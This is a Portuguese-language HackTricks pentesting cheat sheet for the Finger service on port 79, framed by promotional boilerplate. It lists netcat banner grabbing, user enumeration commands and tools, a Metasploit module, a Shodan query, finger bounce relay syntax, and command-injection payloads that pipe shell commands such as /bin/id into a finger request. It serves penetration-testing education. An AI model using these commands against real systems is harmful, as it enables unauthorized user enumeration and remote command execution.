mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-28 07:31:10 +00:00
3.8 KiB
3.8 KiB
79 - Pentesting Finger
Aprenda hacking no AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!
Outras formas de apoiar o HackTricks:
- Se você quer ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF, confira os PLANOS DE ASSINATURA!
- Adquira o material oficial PEASS & HackTricks
- Descubra A Família PEASS, nossa coleção de NFTs exclusivos
- Junte-se ao grupo 💬 Discord ou ao grupo telegram ou siga-me no Twitter 🐦 @carlospolopm.
- Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do HackTricks e HackTricks Cloud.
Informações Básicas
Finger é um programa que você pode usar para encontrar informações sobre usuários de computadores. Geralmente lista o nome de login, o nome completo e, possivelmente, outros detalhes sobre o usuário que você está investigando. Esses detalhes podem incluir o local do escritório e número de telefone (se conhecidos), horário de login, tempo ocioso, última vez que o e-mail foi lido e os arquivos de plano e projeto do usuário.
Porta padrão: 79
PORT STATE SERVICE
79/tcp open finger
Enumeração
Captura de Banner/Conexão Básica
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79
Enumeração de usuários
finger @<Victim> #List users
finger admin@<Victim> #Get info of user
finger user@<Victim> #Get info of user
Alternativamente, você pode usar o finger-user-enum do pentestmonkey, alguns exemplos:
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt
Nmap executa um script usando scripts padrão
Metasploit usa mais truques do que Nmap
use auxiliary/scanner/finger/finger_users
Shodan
port:79 USER
Execução de comando
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
Finger Bounce
Use um sistema como um relay de finger
finger user@host@victim
finger @internal@external
Aprenda hacking em AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!
Outras formas de apoiar o HackTricks:
- Se você quer ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF, confira os PLANOS DE ASSINATURA!
- Adquira o material oficial PEASS & HackTricks
- Descubra A Família PEASS, nossa coleção de NFTs exclusivos
- Junte-se ao grupo 💬 Discord ou ao grupo telegram ou siga-me no Twitter 🐦 @carlospolopm.
- Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do HackTricks e HackTricks Cloud.